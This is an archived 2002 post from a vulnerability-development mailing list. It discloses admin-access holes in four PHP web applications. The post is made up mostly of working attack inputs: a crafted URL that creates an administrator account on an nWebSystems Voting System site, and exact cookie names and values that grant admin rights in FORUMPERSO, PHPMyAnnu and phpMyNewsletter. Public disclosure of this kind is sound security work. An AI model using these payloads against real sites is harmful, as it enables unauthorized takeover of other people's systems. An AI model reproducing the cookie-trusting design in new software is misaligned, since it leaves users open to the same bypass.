Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Multiples holes in PHP services.

From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 11 Feb 2002 16:08:49 +0100
The url http://www.host.com/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save allow to create an admin access (nick : test, password : test) on a nWebSystems Voting System site. 

More details in french :
http://balteam.multimania.com/Tuts/nwebsystemsvs.txt

FORUMPERSO v2.1 :
Anyone can be admin if he send the cookies "pass_ok[0]","1" and "pass_ok[1]","admin" to the page http://www.host.com/connect.php3?id_forum=&addr=install.php3. 

PHPMyAnnu v2.02 :
Anyone can be admin if he send the cookie "phpmyannu_admin_ok","yes" to the page http://www.host.com/path/admin/admin.php3. 

phpMyNewsletter v0.6.6 :
Anyone can be admin if he send the cookie "adminnews","true" to the page http://www.host.com/admin.php3. 

More details in french :
http://balteam.multimania.com/Tuts/4cookieholes.txt

frog-m@n



_________________________________________________________________
Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp.
Previous By Date Next
Previous By Thread Next

Current thread: